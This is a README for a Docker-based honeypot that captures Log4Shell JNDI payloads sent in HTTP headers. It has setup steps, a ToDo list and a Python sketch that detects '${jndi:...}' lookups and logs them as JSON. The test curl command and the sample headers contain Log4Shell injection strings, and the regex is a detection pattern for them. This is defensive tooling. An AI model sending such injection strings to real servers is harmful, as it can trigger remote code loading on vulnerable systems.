# log4shell-honeypot
Catch and download `log4shell` payloads sent within HTTP headers. Modified version of Adikso's minecraft honeypot, sysgoblin's log4shell-honeypot and LoginRadius.

## Setup
1. `git clone $repo`
2. `docker-compose up`
3. Send payloads within an HTTP header to `$dockerip:$port`

To add additional honeypots on different ports, copy and paste an existing service within `docker-compose.yml`, change the service name, and alter the ports within `ports` and `command`.

Example test request:

```sh
curl --user-agent '${jndi:ldap://}' http://localhost:80
```

Payloads are saved within `payloads/`

Logs are printed to the screen by default, but can be retrieved with `docker inspect`, e.g.:

```sh
docker inspect --format='{{.LogPath}}' log4shell-honeypot_http_1 | xargs cat
```

## ToDo
1. Fix display of static files (probably a proxy issue).
2. Log format needs to be modified to ISO8601 and to match the format used in T-Pot (preferably JSON).
3. At the time of writing, the honeypot logs the requests sent; it would be nice if the username/password form could also log the sent payloads.
4. Make the front-end look a bit nicer.
5. Better testing environment. Maybe with a self hosted LDAP server to validate all functions.
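
As an added illustration (not code from this repository), the sketch below shows how a request's headers can be scanned for `${jndi:...}` lookups and written out as a JSON record with an ISO 8601 timestamp, the format ToDo item 2 asks for. The function names, field names and sample addresses are assumptions made for this example. It matches only the plain lookup form used in the `curl` test above and does not claim to reproduce the T-Pot schema.

```python
import json
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Plain ${jndi:<scheme>://...} lookups only; the URL part may be empty.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^}\s]*)\}", re.IGNORECASE)

# Constructed sample headers (documentation addresses, not real traffic).
SAMPLE_HEADERS = {
    "Host": "localhost",
    "User-Agent": "${jndi:ldap://192.0.2.10:1389/a}",
    "X-Api-Version": "${jndi:ldap://}",
}


def find_jndi_lookups(headers):
    """Return one dict per JNDI lookup string found in any header value."""
    hits = []
    for name, value in headers.items():
        for match in JNDI_RE.finditer(value):
            scheme = match.group(1).lower()
            try:
                target = urlsplit(f"{scheme}://{match.group(2)}")
                host, port, path = target.hostname, target.port, target.path
            except ValueError:  # malformed host or port: keep the raw string only
                host = port = path = None
            hits.append({"header": name, "lookup": match.group(0),
                         "scheme": scheme, "host": host, "port": port, "path": path})
    return hits


def log_record(src_ip, headers, now=None):
    """Return a JSON log line with an ISO 8601 UTC timestamp, or None if clean."""
    hits = find_jndi_lookups(headers)
    if not hits:
        return None
    now = now or datetime.now(timezone.utc)
    return json.dumps({"timestamp": now.isoformat(timespec="seconds"),
                       "src_ip": src_ip, "lookups": hits}, sort_keys=True)


if __name__ == "__main__":
    print(log_record("198.51.100.7", SAMPLE_HEADERS))
```

Every header is checked, not just `User-Agent`, and the raw lookup string is kept even when the embedded URL is empty or malformed.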